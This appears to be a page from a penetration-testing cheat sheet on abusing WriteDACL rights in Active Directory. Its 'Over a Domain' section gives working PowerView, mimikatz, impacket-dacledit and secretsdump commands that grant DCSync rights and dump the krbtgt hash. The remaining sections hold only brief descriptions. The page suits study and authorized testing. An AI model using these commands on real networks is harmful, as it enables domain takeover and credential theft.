search

WriteDACL

With WriteDACL rights over an object, we can grant ourselves any privilege we want.

hashtag
Over a Domain

This can be leveraged to perform a DCSync attack.

hashtag
Windows

# PowerView
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity x7331 -Rights DCSync

# DCSync
mimikatz.exe "lsadump::dcsync /domain:marvel.local /user:krbtgt /csv"

hashtag
Linux

# Assigning FullControl permissions over the user
impacket-dacledit -action write -rights DCSync -principal x7331 -target-dn dc=marvel,dc=local -dc-ip 10.10.10.5 marvel.local/x7331:'Passw0rd123!'

# DCSync
secretsdump.py -just-dc-user krbtgt marvel.local/x7331:'Passw0rd123!'@10.10.10.5

hashtag
Over a User

Grant yourself FullControl of the user.

hashtag
Windows

hashtag
Linux

hashtag
Over a Group

This can be leveraged to add members to the group.

hashtag
Windows

hashtag
Linux

hashtag
Over a Host

Grants FullControl of the computer. This can be leveraged to read the LAPS password or perform RBCD against the target host.

hashtag
Windows

hashtag
Over a GPO

Grants FullControl of the GPO. This can be leveraged to edit the GPO and take over an object the GPO applies to.

hashtag
Windows

hashtag
Over an OU

Grants FullControl of the OU. This can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.

hashtag
Windows

PreviousWriteOwnerNextWriteSPN

Last updated